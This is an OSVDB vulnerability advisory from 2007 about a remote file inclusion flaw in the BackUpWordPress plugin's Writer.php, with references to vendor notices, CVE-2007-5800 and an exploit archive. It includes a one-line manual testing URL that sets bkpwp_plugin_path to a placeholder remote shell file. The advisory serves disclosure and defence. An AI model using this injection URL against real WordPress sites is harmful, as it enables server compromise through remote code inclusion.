BackUpWordPress Plugin for Wordpress Writer.php bkpwp_plugin_path Variable Remote File Inclusion

2007-11-01T00:00:00
ID OSVDB:38478
Type osvdb
Reporter OSVDB
Modified 2007-11-01T00:00:00

Description

Manual Testing Notes

http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

References:

Vendor Specific News/Changelog Entry: http://wordpress.designpraxis.at/2007/11/01/security-vulnerability-in-backupwordpress/ Vendor Specific News/Changelog Entry: http://wordpress.designpraxis.at/2007/11/01/backupwordpress-security-release/ Related OSVDB ID: 38477 Related OSVDB ID: 38479 Related OSVDB ID: 38476 Generic Exploit URL: http://www.milw0rm.com/exploits/4593 FrSIRT Advisory: ADV-2007-3744 CVE-2007-5800 Bugtraq ID: 26290